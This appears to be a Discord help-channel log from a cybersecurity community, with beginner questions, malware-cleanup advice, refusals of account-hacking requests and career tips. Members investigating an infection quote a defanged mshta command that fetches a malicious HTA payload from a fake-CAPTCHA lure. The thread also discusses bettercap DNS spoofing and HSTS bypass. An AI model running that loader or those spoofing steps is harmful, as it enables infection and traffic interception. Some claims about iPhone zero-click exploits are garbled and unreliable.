#šŸ‘„ćƒ»help-me

1 messages Ā· Page 56 of 1

radiant stone
#

Tria.ge is free, you can make an account

candid lotus
#

@eager knot want to help?

candid lotus
eager knot
#

but other than that i'm afraid i can't help you since i've never messed around malware removal before

crisp star
#

You guys still talking about that malware stealer?

eager knot
#

dunno

#

this guy has a sister that is cooked

crisp star
#

Yea already told him just to wipe everything clean on the device and change all passwords.

candid lotus
#

šŸ”„

#

honestly deserved

#

she expects me to have a gods hand and cleanse her pc with my hand

#

and magically change all her passwords

#

which she has tons of

candid lotus
#

snorting white powder?

eager knot
#

it's an IDS and IPS system

candid lotus
#

..

eager knot
#

can detect malicious traffic on the local machine

candid lotus
#

explain to me like im a chimpanzee

#

ok

nocturne monolith
#

Have you tried scanning with "Kaspersky Rescue" or "Dr.web" for example ?

eager knot
#

i'd format

#

honestly

#

just tell your sister to bring it to an IT guy

#

he'll do it

crisp star
#

If itā€˜s a password stealer which was executed in-memory your AV probably wonā€˜t find anything.

candid lotus
#

yea no he will ask money for just a fresh indtall

#

hmm

nocturne monolith
crisp star
candid lotus
#

malware is honestly too advanced now

crisp star
#

it only takes a few seconds to exfiltrate your data

nocturne monolith
crisp star
#

Do you still have the link of the malicious website or the command she executed?

candid lotus
candid lotus
#

i do

#

can u try to run it through triage?

crisp star
#

can you send it to me. just gonna have a quick look

candid lotus
#

ok

granite hound
#

hi

dapper forge
#

theres plenty of guides on how to reset windows with the usb method

eager knot
#

ik

spiral notch
crisp star
spiral notch
#

what

#

how does that make sense

supple grail
#

it doesnt

crisp star
#

It's a command that you have to run which will download a malicious HTA file.

#

And you can't just go to the website to download it since that request will be blocked.

#

Tried it. Still getting an error 403.

#

Also detonated in anyrun which also didn't work.

#
mshta hxxps[://]my-store[.]fly[.]storage[.]tigris[.]dev/v1[.]html?spaceid=11731225&subid=117&spaceid=11731225&su bid=117
#

Just use cyberchef to fang it

#

Nope didn't got the original link.
@candid lotus was the one sending me the link.

eager knot
#

maybe it has a generating mechanism

crisp star
#

But to be fair, there should be more than enough sample that are using the Fake CAPTCHA to distribute malware.

solemn spire
#

can someone help me with my assignment please im totally lost 😭

solemn spire
plain pond
#

I have some problems with internet do you think i should join the chanel and talk with anybody or is there somebody who should know how to help?

spiral notch
plain pond
#

pv

zealous cliff
#

theoritical question: is there any way to supercede "topper()" in C programming if someone wanted to get into a network by using the caps lock?

fringe mural
#

Does anyone have an idea how I can fetch my vulnerability tool a lot of CVE’s it uses AI

maiden sphinx
#

Anyone use hackerOne? I submitted my first flag in the ctf section and the other level buttons won’t pop up

whole herald
#

Does anybody know of a way that I can hack a Wi-Fi network using my iPhone SE without jailbreaking my phone or using a computer?

#

OK, I had just read the do’s and don’ts so I apologize

#

No, it is my Wi-Fi network. It’s my mom’s actually I was just trying to see how I can tinker around with it.

#

Like I seen this tool and I can’t remember what it’s called but you can knock people off of the Wi-Fi and I was just trying to figure out how to do that

#

Is jailbreaking an iPhone unethical?

#

Okay I appreciate it a lot

zinc phoenix
whole herald
#

Understandable

rancid barn
#

how cna i find skmeones name off of their email

zinc phoenix
#

No.

rancid barn
#

mb my friend was tryna make me find his

#

my fault

zinc phoenix
rancid barn
#

cuz i got his email and he bet me 20$ i couldnt get his name off of js his email

zinc phoenix
#

Honestly

zinc phoenix
rancid barn
#

i can send u a ss lol

#

we play mc together

zinc phoenix
#

whether its from a open source or closed source it will most likely be against peoples morals

zinc phoenix
mint oxide
#

How about hacking in cod warzone thru console😭 anyone got a trick up there sleeve for that

mint oxide
#

I’m new to this whole thing bro never hacked

#

My bad nvm

zinc phoenix
haughty nova
#

It isn't unethical but however it does void apple's warranty but it wouldn't matter if its old

#

first mistake is bringing it to an apple store (they'll just overprice you for whatever problem you have lol)

#

Store repair vendors? It would be cheaper than going directly to the apple store

#

Unless neglect or misuse is detected, they do have the power to void their warranty, which should be stated in their Terms of Use

chilly merlin
#

meow

haughty nova
#

Again, it is possible for a company to void a warranty if misuse was detected. Google.

#

If you ever go inside an electronic device, and the internals strictly state that "If you see this, your warranty is voided" for example

#

every company and consumer agrees within A purchasing deal

#

not like that. Jailbreaking your iphone can still be a reason to void your warranty

#

its abusing against Apple's firmware that is installed for the consumer

#

It would be legally applicable to sue a company for voiding your warranty for no found reason. Thats what the act is about

#

"Apple's stance:
Apple states that their warranty "does not apply ... to an Apple Product that has been modified to alter functionality or capability without the written permission of Apple".

#

It has been for a decade now. Ever since jailbreaking became the trend within the early 2010s, like Cydia.

#

im sure apple didn't like how people messed with their products that bypasses their restrictions

fringe mural
remote quiver
#

Hey everyone!
I’m Jay and super excited to be part of this community. I’ve been interested in cybersecurity ever since I was a kid. Back then, I built my own game and had a blast figuring out how things worked (and I’ll admit, hacking Roblox games was pretty fun too šŸ˜…). That curiosity eventually sparked my interest in pursuing cybersecurity as a career.

Right now, I’m working on my Google Cybersecurity Certification and learning as much as I can. I know there’s still a lot to explore, so if anyone has tips, resources, or suggestions on what I should check out, I’d really appreciate it. Looking forward to learning and connecting with everyone here!

muted plover
#

Hi i am new here

#

how can i get someone infromation from Phone number

#

my bad

#

Phonelnfoga is not working

zinc phoenix
frozen radish
#

I need someone to check out my computers. I’m pretty certain they have been hacked and would like some confirmation. Same goes for my phone, if anyone does iOS.

dapper forge
#

youd have to have downloaded something from outside of the app store and even then

frozen radish
#

I’m very careful and I run in lockdown mode on iPhone.

dapper forge
#

get a good av on your pc and maybe run a scan with emsisoft emergancy kit/sophos scan and clean

frozen radish
dapper forge
#

you mean you can get malware through the app store?

frozen radish
#

The government and other NGOs have strong hacking abilities for iPhones.

#

I have a windows server running windows 10 with Xeon processors.

dapper forge
#

iphones cant JUST get malwsre

#

is what i mean

frozen radish
#

It’s a targeted attack IMO.

#

Yes

#

No

dapper forge
#

Because its not common for iphones to be infected

frozen radish
#

Agreed, but just bought it for running android virtualizer and a bot for a game. Nothing else, nothing more.

#

Is there a way to protect myself from this happening again?

dapper forge
#

using a good av

frozen radish
#

I’m doing everything I’m supposed to be doing.

#

Yes, sir or ma’am, I know it’s coming.

#

As for the iPhone, I know when it’s being hacked. Running in lockdown mode, about a week to a day before Apple releases a security fix, both phones get very glitchy. Hang, restart, etc. it’s a patter that I can see. And know that it’s not just happenstance.

#

I know where you’re coming from and I appreciate that you have people that don’t understand that or don’t understand what lockdown mode entails. This is cyclical. Every release my phone starts glitching. Why no glitches in between? It’s indicative of a flaw being released (publicized) and trying to be used, IMO.

#

Can you even hack a computer and see if it is being hacked by someone else?

crisp star
#

You being hacked usually involves an action done by the user (you).

frozen radish
#

Usually is the keyword there. I have limited all my apps, my browser activity on my iPhone. The computer does nothing but run bluestacks and esp-TKR

#

Esb*

#

literally nothing else. No browsing, no apps, nothing

#

So…sometimes it just shuts down. No update, nothing in logs about errors. Other times some of the android instances behave as if someone is remotely controlling them.

solemn wasp
#

sorry if this is completely random I just need this as a reference, is 20k or so attempts a second for pbkdf2 with 20,000 iterations and decrypting aes 128 cbc a "hash rate" for being run on an rtx 5090

#

it's written in ILGPU in c#

frozen radish
#

They individually (certain instances) shut down. The mouse doesn’t respond appropriately. Just as a couple examples.

#

There are no errors in the logs, as I said.

crisp star
#

Maybe it's an issue with your mouse?

#

Also in case of shut down. From where did you pull the logs from?

frozen radish
#

Bought 2 new mouses and it’s done the same with all of them.

crisp star
#

Could be a driver issue then. Or a USB port issue.

#

Who knows.

frozen radish
#

I don’t remember where I pulled logs, but I got where to look from online.

solemn wasp
#

if if there would be room for improvement etc

frozen radish
#

It’s not just on one computer. I have a second computer, newer, only running one instance and it’s having the exact same issue. No other players that do what I’m doing are experiencing what I’m experiencing.

crisp star
#

True. You being infected would involve you executing something on your device that you downloaded from the internet.

frozen radish
#

No downloads except for blue stacks and ESB

#

No web surfing.

solemn wasp
#

ah yes bluestacks, the legal virus frfr

crisp star
#

I doubt that basic malware would move lateral from one device to another.

frozen radish
#

Agreed šŸ‘šŸ»

dapper forge
#

what else then

frozen radish
#

I know there’s a lot that can be dismissed to bugs or whatever. But when there is a pattern, it’s been my experience that rarely is it happenstance or luck.

dapper forge
#

yes but you have to run malware for it to operate, or do you disagree

frozen radish
#

I’m willing to pay. Especially for the iPhone.

dapper forge
#

yes, zero click attacks

frozen radish
#

Okay. Thank you @last maple

dapper forge
#

Im not sure if you understand the rarity of something like that but that isnt something every second malware is

crisp star
#

Would be a waste to use a 0 click on a random person

dapper forge
#

apparently every second infected person is hacked with a zero day exploit

frozen radish
#

I’m targeted. I know that. Nothing illegal. Just got a dea agent in trouble. This is his retribution,IMO.

crisp star
#

Zero click and zero day are not the same.

dapper forge
#

both arent of concern to a regular person

#

is my point

#

i never said its impossible

frozen radish
#

He was a bad neighbor engaging in illegal activities.

#

I think the zero clicks don’t work since I’m in lockdown mode and disabled iMessage.

#

I suspect it’s the vulnerabilities that come out with the new versions of iOS being released.

#

You can’t convince me it isn’t happening. The bugs that started about 1 week to 1 day before an iOS update release end when it’s updated.

#

Someone has to be able to help me. Monitor my internet traffic? Something. I’m not asking for it to stop. I just need proof.

#

Feel free to DM me.

zinc phoenix
#

Its usually people want to get payed find such vulns not bad actors

zinc phoenix
#

Hypothetically if i was a bad actor and i had any sort of advantage exploit to target a user without any interaction. It would be someone more important and not a random person, again people are usually in for the money

frozen radish
#

Okay, well that’s something that would make me a target as well.

#

I keep my investment and bank accounts usernames and passwords out of the passwords app on iPhone.

zinc phoenix
#

Its very unlikely you are being targetted on ur iphone the changes are too low

frozen radish
#

Please know that I understand what you’re saying, and just given the off chance that I am a valuable target to someone, anyone. What then

crystal lark
# frozen radish Please know that I understand what you’re saying, and just given the off chance ...

Ok look, iPhones can 100% be exploited (even with the latest stable releases coming out) with a malware as gruesome as a 0-click and it's happening in the wild. Most agencies work with extremely confidential zerodays to target a high-profile group or individual for espionage. I myself have worked with such malware and I'd say it's not just deployed onto "any" individual as it's an extremely sophisticated attack to follow. Most such cases, a malware uses a vulnerable module as a hop point to escape iPhone's code execution sandbox to gain access to rest of the user space. I've seen many traditional 0-click malware making use of FORCEDENTRY to deploy GIFs containing a malicious document through iMessage because of a zeroday in the JBIG2 image compression codec that had an integer overflow bug, besides disabling the ASLR through a system module (i forgot the name) and which bypassed PAC as well

#

I remember BlastDoor that was used to escape the sandbox as we had a workaround for it by stationing the code into a custom logic circuit

#

Point is, it can be done, but it's too much for a single user to create a malware on, as malware such as this and development of it can be only afforded by organizations

#

And each deployment can cost up to hundreds of thousands of dollars

#

I forgot but there was a recent patch of another critical vulnerability that led to 0-click deployment of malware supporting multiple apple devices

#

It was in march itself I forgot the CVE assignment of it

stray mural
#

Damnnn

sour bluff
#

Hi everyone! My Twitter recently got hacked and I have no idea how.šŸ˜”

I kept getting the emails for a security code (forgotten password) for logging back in but I ignored those as obviously it wasnt me sending them and I thought I didnt have anything to worry about (I get these for Instagram too every now and then). Since I assumed without having access to my email they couldnt get the code to get in. However to my surprise, after a week of trying (me getting those emails and ignoring) I suddenly got an email which confirmed breach in my account. I have absolutely no idea how they managed to get in without the code from the emails (and my email wasnt hacked, I did re-check my Gmail after this to ensure it wasnt them getting access via email). They got in somehow and I got the email that my password was successfully changed, and immediately afterwards the email confirmation for setting up 2FA. This is where I realized I made a massive mistake and it was too late. While my email is still connected, because hacker turned on 2FA I am basically locked out, since I have no access to the code authenticator app the hacker set up with 2FA.

I hopelessly immediately contacted X support and explained my case, but have received no response from them and upon searching online and on Reddit I realized how abysmal X has turned since Elon got rid of all the personnel, and how with no real human support being available for normal users you’re left with nothing.

My Twitter is literally my full name with my own picture, I wasn’t even active on it (planned to be later) and I have no idea WHY and most importantly HOW they hacked me. If only there had been a real human support available on X I could have easily proved identity with my picture and claimed authority of account, but that seems to be out of the question thanks to Elon.

I’m kindly asking for any advice or help anyone could possibly have on the matter. I just really wish I could get my account back😢😢😢

tall flume
#

I'm stuck in this endless loops and rabbit wholes of VMs, I installed "Kioptrix Level 1 machine" using the UTM software on my Macbook M4 Pro, now the problem i have ran into is that when i ping the default gateway of 8.8.8.8 from the Kioptrix machine to check whether it has internet access or not then it says "Destination host not reachable" can't really figure out a solution to this problem and have been stuck in this thing ever since

Pls help, if anyone knows a fix for this

amber matrix
#

@sour bluff do you use the same password for everything?

#

And you should have turned on 2FA from the start

#

Yk because a lot of hackers will try every password you have until one of them works for you’re stuff

#

If you use the same one you’re making it easier for the person

radiant stone
sour bluff
# amber matrix <@786582692376477756> do you use the same password for everything?

Uhhh yes some are the same or similar varieties, I do know its a bad ideašŸ˜… its just out of convenience even though I know better unfortunately. I just mostly rely on the phone verification for sending codes as security.

Yeah that’s where I knew I messed up and didn’t immediately turn 2FA on after receiving those attempt emails, but I also didn’t even know it was a thing because I hadn’t been active there for so long. I just never thought i’d be a target, my account is literally zero on everything (posts, followers, etc).

sour bluff
amber matrix
radiant stone
amber matrix
#

You should have took extra safety measures to make sure you’re account was fully safe

sour bluff
#

My apologies, I thought I could ask for help or advice. Thanks for your information

radiant stone
#

Any further action would be account breaching which is illegal in most countries on top of being unethical.

amber matrix
#

Ima go now

#

Thx for the help milk

nocturne monolith
#

Hi, I'd like to know the big difference between TryHackMe and HackTheBox, they both have good reputations but which one is "better"?

stray mural
#

Thm is beginner friendly

#

But htb requires some pre knowledge

#

Htb is recommended for intermediate to advanced

nocturne monolith
#

Ok thank you

heady zenith
#

hi

#

i got a Question.pentesting or red team

radiant stone
heady zenith
#

ok thank u man

radiant stone
# heady zenith ok thank u man

No worries,
Pentesters are just a term for people who test the vulnerability of a system / network / application etc.

The teams just mean Defense or offense
Blue may do some pentesting but ususally will hire Red teams to do audits.

heady zenith
#

mm, i am learning about network , how important is that for pentesters?

mental tendon
spiral notch
#

Ive worked as a network pentester, it's really important considering how much data gets transferred locally and how easy it is to intercept them

fluid totem
#

wuts a good place to learn AD from

frozen radish
# crystal lark Ok look, iPhones can 100% be exploited (even with the latest stable releases com...

@crystal lark thank you for hearing me. I really appreciate being heard and having someone explain it like you did. I’m not some crazy guy that thinks the government is out to get him. I’m a guy that knows someone is out to get me. Who, I don’t know. This is really happening and I have proof to back it up. But what do I do if this isn’t some legit government investigation. What do I do if this is someone with an axe to grind? I already know the answer, there isn’t much you can do if they have their sights set on me. I really came here for concrete proof. Hoping someone could show that my phone was answering or sending data to a certain server. I know it wouldn’t change things, but it would help me plead my case to an attorney. I’m not doing anything illegal, but I’m being treated as if I’m some mob boss. Getting get well cards in my mailbox when no one knows I’m sick…

runic hawk
#

When i type this cmd ngrok tcp 80 they tell that I must have a credit card but I dont have it

mental tendon
neon raven
fluid niche
#

I am a bit of a beginner, what would you reccomend my first Linux be?
A friend reccomended Kali, I've heard good things about Ubuntu and Arch, too many options to weight

eager knot
fluid niche
#

All I know is how to navigate the cmd and code in 2 lamguages

eager knot
#

there's a study path

fluid niche
#

Thank you, that was very helpful

#

Have a great day

eager knot
#

you too, gl!

foggy void
#

i love cyber security , but inorder to learn that i must know networking is this "Network Basics for Hackers by OccupyTheWeb" book will be enogh for me to learn the concepts of networking , i am new to this stuff can anybody help me

eager knot
supple grail
#

I have a Kubuntu virtual machine in VMware and whenever i try to make it fullscreen it refuses and just stays the same size and it traps my cursor in the window, i cant move my cursor out of the Kubuntu no matter what i try

twilit tendon
#

Is there any ip grabber that also grabs port?

mental tendon
zinc phoenix
crystal lark
# frozen radish <@758044896996098189> thank you for hearing me. I really appreciate being heard ...

I understand your situation and its natural to be paranoid about this. Unfortunately though we couldn't do much online since you'd have to intercept inbound and outbound traffic of your phone to acknowledge the presence of a C2 server your phone is responding to. I'm not sure what proof you have that confirms you're being targetted, but you could always check for abnormal internet usage from your phone, quick battery drain, overheating or strange behavior such as apps/files disappearing on their own. These are (not necessarily) signs of a compromise, but these symptoms may be false positives if your iPhone is old

crystal lark
crystal lark
#

Obviously you wouldn't hear the news of it, because exploits like these are meant to do business. Not everything is meant for the public. That's how groups like NSO and Intellexa function

sterile musk
#

Hey guys basically my old YouTube account (when I was 7) has my face and my family’s face and private info I forgot my password and it’s honestly a risk can anyone try and get the account?.

zinc phoenix
#

But your alternative will be to make a report to youtube its self regarding the account and situation

#

If you are in the EU theres something called a GDPR for privacy laws to request on removing any personal data.

#

if that doesnt work it would be best to go on youtubes complaint forum and report the privacy issue driectly to them

sterile musk
#

I’m in Aus so idrk

zinc phoenix
#

But you will need to require some sort of evidence if request by the agent you would speak to

sterile musk
#

I’ll go straight to the YouTube complaints then thanks man

zinc phoenix
#

Its under australian privacy acts i could look into it for you and make sure that im correct

#

but for now work on the complaint form and try figure it out with youtube

#

if that doesnt work there is another altnative

#

to take it off google's search entirely by making a privacy act too google its self but that wont stop other search engines i believe

neon raven
dry needle
#

so i need help with meta world, my fiance account got banned because of word mouth. i need help

#

they gave her a temporary ban but it came warranted

#

unwarrented***

zinc phoenix
mental tendon
neon raven
zinc phoenix
#

Which of course is a horrible and disgusting privacy risk

neon raven
zinc phoenix
#

I dont do anything illicit or illegal so they would and never will get a reason to see my data

crisp star
#

You should rather try and secure your account.

split moth
#

I understand but they logged in withy password and messaged people and logged out without changing anything. I've lived alone for quite some time so no way for anyone to have it!

crisp star
#

There are multiple ways how you got your account compromised. This can range from running malware, re-using the same password that got leaked by a database breach, using a weak password or you fell for a phishing attack.

exotic magnet
#

can i get some help in analyzing a pcapng file

#

?

shy pilot
#

Hi

mental tendon
exotic magnet
#

bruh u know that lmao

#

lol

#

i am extracting zip file from the pcap file and putting credentials that i found from the same file in it , but they are incorrect..furthermore , the zip files appear to be invalid isk why

broken spindle
#

I got stuck. My VirtualBox is not support usb devices. It shows no device available even though I attached my wireless adapter with my laptop

#

This was happening since Last night , since I updated VirtualBox 7.1.6

rapid valve
#

Hello guys , I've recently started working on a web scrapping project , but I have some problems when I am trying to get the data from different cars selling websites . Is here someone who can drop me a tip on what I should do ? Thanks

mental tendon
rapid valve
#

Hmm , I am using Selenium but I usually get blocked after first search , I get 403

#

maybe I need to create a fingerprint

spice skiff
#

Brothers can anyone help me study cybersecurity

#

Im a begginer with no knowledge

vernal reef
#

Im a beginner with no knowledge and wanted to get into CTF. However, I have no idea what I am doing. Can anyone explain how to get into CTF? I have tried to watch youtube videos, but I have no idea what is going on.

earnest tree
#

Hello guys, which is the best way of learning pentesting? (I want to become a great white hat)

sterile quail
#

I need help anyone is here 😩

naive olive
#

guys i saw a video guy changeing his ip in like 3 secs i followed the steps installed tornet it worked but does it rly work?

spiral notch
#

its pretty sketchy

exotic magnet
#

hey umm anyone knows how to run .elf files extracted from pcapng files?

magic ginkgo
#

I'm doing the wazuh install https://documentation.wazuh.com/current/quickstart.html for the SIEM

I've downloaed the wazuh-manager and have the password and such for the dashboard, but it says to use https://<wazuh-dashboard-ip>:443 to access the dashboard, which IP is this? I've tried my IP, that doesn't work, and I've tried the ip's listed on my ifconfig in linux

Anyone have any ideas?

exotic magnet
#

ask gpt maybe

magic ginkgo
#

tru

#

GPT to the rescue

#

it worked

vernal fox
#

Guys my discord auto joins servers

#

Plz help

#

It is not hacked but I did joined a server where I ask for verify after that it auto joins server

spiral notch
vernal fox
spiral notch
#

under section "authorized apps"

vernal fox
#

Ok thanks

magic ginkgo
#

Need help with wazuh, I setup the agent on my windows PC, but its not showing on the wazuh dashboard, my VM is set to NAT which I believe I need to port forward for the VM to get connections from host i think?

I set up an ssh port forward but not sure i did it right, any ideas?

warm trellis
#

Hi

calm bone
#

first time asking a question. played an anonymous message game with my course mates and there was a de*th threat, is there any way i can know who sent the message, ip, number or anything that can make it easy for me to know who the person, please suggestions

amber matrix
#

šŸ’€

#

šŸ’€

#

šŸ’€

dapper forge
spiral notch
#

we dont help with things that can be done or used for unethical/illegal purposes

remote wadi
#

I am at beginner lvl 1/10
On coding

remote wadi
#

I got myself old school display,cos I just want to try it out too ,

remote wadi
nova peak
#

why is their no section for tools ??

dapper forge
#

what type of tools do you need

eager knot
chilly merlin
#

Does anyone in here have a way of making any money? In dire need rn, for rent for this sober living, iv tried reaching out for resources and no one will do it because it’s a sober living.

#

I’m in college and I don’t make much money.. but now I am almost completely broke.

spiral notch
#

you need experience or will to learn

#

for them

chilly merlin
#

Sure what is it ?

#

Message me

soft smelt
#

hi guys so in the past month I've had roughly 4 login attempts into my steam account from all over the world, my password is pretty good security wise so I reckon it must be a trojan or something similar downloaded to my computer, would amy of you know a low cost/free amtivirus that could reliably scan my computer and find the issue?

chilly merlin
soft smelt
sand valley
#

Now tell me. Is there a good market for insider threat detection and mitigation application for companies?

chilly merlin
soft smelt
#
  1. I have no idea how to check that. 2. I have changed all passwords since the last one and it happened again
sand valley
soft smelt
#

yeah man it only says my phone and pc but I keep getting the 2fa codes sent to my email and if someone happens to get that then they can obv take my steam account too

sand valley
#

Yeah it’s highly likely that your information was included in a data breach

#

If you really want to get rid of this you might want to change your email for temporary basis

#

I don’t know how far that can help you but it is something

soft smelt
#

hey man thank you so much I really am a very beginner at all of this cybersecurity stuff so I appreciate all the help I can get from you guys more experienced than me

sand valley
#

No problem, always here to help and share knowledge.

dapper forge
#

sophos and emsisoft are paid but have second opinion scanners

#

also id use 2fa with an app like google auth if i were you

spiral notch
soft smelt
#

just did a scan for data breach

#

a good few on some telegram channels and a blackhat upl, what should be my next step?

dapper forge
#

change your password

#

use a password manager (bitwarden for free) if you dont already, and a 2fa app like google/microsoft authenticator

sand valley
soft smelt
#

yeah for sure man thank you, I was really stressed for a minute there

dapper forge
#

still scan your pc for malware though

#

i recommend emsisoft emergency kit, sophos scan and clean or a full av (bitdefender or Kaspersky) for that

nimble lintel
#

How do I learn how to hack ig account

supple grail
#

Hacking social media accounts is unethical and illegal

noble dragon
#

How are you trying to be a white hack and ask a question like that?

zinc phoenix
zinc phoenix
wanton maple
#

Does anyone know how to delete Kali Linux

eager knot
wanton maple
#

As my primary os

stray mural
#

You installed Kali as your primary os?

#

Dual boot?

#

Or deleted the windows

wanton maple
#

just my primary os

soft smelt
#

Is tryhackme's paid version worth it to begin learning about cybersecurity or no?

wanton maple
#

I would say it is, same with htb

#

as for which is better idk

zinc phoenix
#

It gives u a whole section for education

soft smelt
#

I am a complete beginner for referance and also if any ogf you guys learned anywhere else and found it a good beginner friendly experience I'd love to hear aswell because I just have no idea where to even begin yk?

zinc phoenix
#

and starting point for Cybersec

#

HTB should be ur first option

#

then Try hack me

#

try hack me is more straight forward and much easier to navigate

#

with more indepth explination on subjects

#

but hack the box will give you the essentials

#

and fundamentals

zinc phoenix
spiral notch
#

thm is way more beginner friendly

zinc phoenix
spiral notch
#

also you should rather open the person to more options and show your opinion instead of trying to force it onto them, no offense.

zinc phoenix
#

what?

zinc phoenix
spiral notch
zinc phoenix
soft smelt
#

tysm guys i appreciate this alot

#

however this does leave me with the question, htb or thm first?

zinc phoenix
#

U will have more luck with it

#

then move to HTB for more fundamentals

#

This is the education center for hack the box

#

The walkthroughs and indepth explainations are everything someone needs

soft smelt
#

also i am wondering would certs from things like htb help me land a place in uni or just in the job field

zinc phoenix
#

Theres also a few books i think u should look into

#

pentesting by georgia weidman

#

pentester blueprint philip L

zinc phoenix
#

they are only good on paper yes they do make stuff easier

#

but its better if u go on a org cert

zinc phoenix
#

If you are getting a job then get something you enjoy so try out with college or internship or apprenticeships

#

internships are the absolute best for contracting and education while on site pay

#

Its the most logical step in my opinion

soft smelt
#

would it limit my job options at all or no?

spiral notch
#

scored a network pentester job by 17 with no cert making roughly 6 figures

zinc phoenix
#

thats good to know

spiral notch
#

no I meant certs in general

soft smelt
zinc phoenix
soft smelt
#

i am 17 currently struggling to find work in sevice industry

zinc phoenix
soft smelt
#

republic of ireland

zinc phoenix
#

thats perfect

#

try looking on gradcracker

soft smelt
#

ive never heard of that

zinc phoenix
#

And apply for some interships

#

on jobs of ur liking

spiral notch
zinc phoenix
#

make sure its not over a 1 year duration contract

#

incase you want to switch your occupation

soft smelt
#

would they even accept me without any previous experience or certs or anything?

zinc phoenix
halcyon flame
#

Dayum, nice advice kat, kudos

zinc phoenix
#

ā¤ļø

spiral notch
#

but yes

#

oh yeah for internships

#

omg I should be more attentive crisisthen

soft smelt
#

so roadmap wise, thm, htb, books, internship ion that order?

zinc phoenix
soft smelt
#

because i still have until i think May-ish 2026 until im oat of highschool so internship not yet an option anyways

zinc phoenix
#

no point of working in a enviroment you hate

spiral notch
#

^^

zinc phoenix
soft smelt
#

kat do u currently work in cybersec or is it on the side hustle?

zinc phoenix
soft smelt
#

something like side hustle?

zinc phoenix
#

nah just work

soft smelt
#

fair enough i will ask no more about your occupation lol

zinc phoenix
#

Best of luck man feel free to ask more questions anytime

soft smelt
#

i appreciate your help alot man

#

thank you

zinc phoenix
#

No problem

spiral notch
soft smelt
calm ocean
#

Yo

shrewd stump
#

helloo

#

hello? is anyone here?

broken spindle
#

I got fu*ked my self , accidentally removed my inbuilt wifi card through cmd prompt while activating my wireless adapter by guidance of chatgpt. Never trust that shit again. Want to install my card again , anyone who helps me in this situation ?

#

@last maple

leaden iris
#

Hi anyone here

zinc phoenix
zinc phoenix
zinc phoenix
cold igloo
#

Hey I’m using bettercap and hsts command and it’s not working it’s still showing the website as https dosnt spoof the domain

vapid finch
#

Soooo I took the ISC2 CC cert test today… failed and now I’m questioning my competency in Cybersec

spiral notch
#

most routers have protections against that as well.

cold igloo
#

I’m using better cap hsts

spiral notch
cold igloo
#

I thought I could spoof the name and change it

spiral notch
#

you can, only for certain websites

#

not HTTPS nor HSTS ones

#

You also need to void the CSP of the website and then downgrade to http

cold igloo
#

Csp?

spiral notch
cold igloo
#

I did that and no matter what I do it still comes up as https

spiral notch
#

you're not gon dns spoof google

cold igloo
#

I was watching a video and it said you could dns spoof

#

Why not

spiral notch
spiral notch
#

HSTS

#

CSP

#

DoH

#

etc

#

They prevent it

cold igloo
#

Then why in the video he was successful doing it to them

spiral notch
cold igloo
#

Yes

spiral notch
#

mind sending me the video?

cold igloo
#

It’s a Udemy class

spiral notch
#

they could've removed their dns configurations or use an mitm cert

#

Which is something you'd have to install on the victims device

#

Do you arp poison the network before u dns spoof?

#

also do u do it successfully? Like do u check after

cold igloo
#

He configured on bettercap to spoof domain name from Facebook.com
To facebook.corn

#

No it’s still showing secure

spiral notch
#

All cimmands

radiant ibex
#

I am genuinely curious how do I know if my phone is hacked

#

I got some rando that spofted my email saying they have access to my account

cold igloo
#

In this video, we dive deep into bypassing HSTS (HTTP Strict Transport Security) in ethical hacking and penetration testing scenarios. Learn the techniques used by ethical hackers to identify vulnerabilities in web security systems and understand how HSTS works to protect websites from attacks like MITM (Man-in-the-Middle). Whether you're a cybe...

ā–¶ Play video
cold igloo
gloomy radish
#

Would you guys recommend using a separate computer for cybersecurity/pentest etc, or will a general purpose PC/laptop work just fine?

cold igloo
#

???

glacial kestrel
#

Can anybody send a good beginner friendly source material for email analysis?

crisp star
wraith tusk
#

Hey guys, i wanted to get into networking and just installed Kali on my VM, but i dont know what to do or where to start. Should i start on HTB?

keen pier
#

I have completed my networking and basic Linux commands,what's next?

eager knot
wraith tusk
#

get you boss, thank you

eager knot
glacial kestrel
crisp star
#

But HackTheBox does have HTB Academy which is more of a guided approach.

glacial kestrel
#

Which of these platforms would be great TryHackme, Let's defend, Hack the box, INE, Cybrary, Rangeforce, Blue Team labs

desert torrent
daring dome
#

Hi everyone im just new here

#

And can someone help me retrieve my Facebook account?

#

I lost my access on it

#

I hope someone would help me

mild nova
#

How can I bypass iCloud on iPhone 12

desert torrent
desert torrent
daring dome
desert torrent
#

Contact their support, if you do have an account linked, they'll fix your issue with no troubles

spiral notch
#

We do not hack accounts or retrieve them as it can be used for unethical or illegal purposes, aswell as the fact that it's impossible to prove its actually you. Refer to #1286135820008296509 #šŸ“œćƒ»rules

#

your best bet is to contact support

desert torrent
#

I have no way with words

cunning robin
#

Any tips on the best way to learn the material in the A+ book because its a big amount i atleast already know 40% or a bit more from common knowlage but I want to get a destiction at my university

broken spindle
#

netcfg -d
netsh winsock reset
netsh int ip reset

#

😭 😭 😭 😭

#

It was like " oem11.inf "

#

Yes but with yellow indicator

#

Can I get you in personal chat I want to show you a pic of it is looks like

#

Did it bro , not working. Restarts many times

#

In properties it showed that the device settings not migrated

#

And information says , require further installation

#

Yes

#

But not worked

#

Is there any command to reinstall .

#

?

zinc phoenix
nocturne tree
#

hi guys i need help. my friend is getting some email related to personal life. how do i trace but the sender and find some info about the sender ?

nocturne tree
#

ok my bad

chilly merlin
#

Allg

#

Just report it to the police if you think its serious

nocturne tree
#

ok

radiant stone
nocturne tree
#

ok thx guys

shrewd meteor
#

Eid Mubarak everyone

#

Tomorrow is Eid

radiant stone
#

I think is the right response at least. Either way have a blessed feast

noble dragon
#

dude, i am trying to do a 1 tool a day from now on, but i cant even get john the ripper to run properly. Is this what being a noob feels like?

pearl zenith
#

my steam doesn't connect after i downloaded something but idk what it is specificly is there a way i could find the program?

noble dragon
#

your running it on Kali?

eager knot
noble dragon
eager knot
#

the basics, aka linux basics, networking basics

noble dragon
eager knot
#

it can be

#

if you like reading books then you can study it by reading

#

there's also tryhackme which has a path

#

in htb i know they specifically have a category with hashcat brute

#

never got to that yet but i know how to use hashcat generally so that isn't a problem yet

noble dragon
# eager knot it can be

I got it to finally work, i mean john, but you might be right on that. I might need the basics first before i start messing with tools

eager knot
noble dragon
eager knot
#

well it depends on the password and your computer resources, something that's worth noting is that john uses both cpu and gpu power while hashcat uses gpu power

noble dragon
#

i got a 9750x amd cpu @eager knot . But its not like i made it impossible lol. its I@mn00b

#

but thank you @eager knot i will start with Linux Basics for Hackers

eager knot
#

no problem!

ancient wave
#

hi my name ic nico im from sout africa i nee help my googel hows hack i nee help

neon raven
#

And if you're locked out of your account by any chance... It's better to contact support

chilly merlin
#

Can anyone recover a wallet.dat file? I forgot the password

neon raven
chilly merlin
raven wren
#

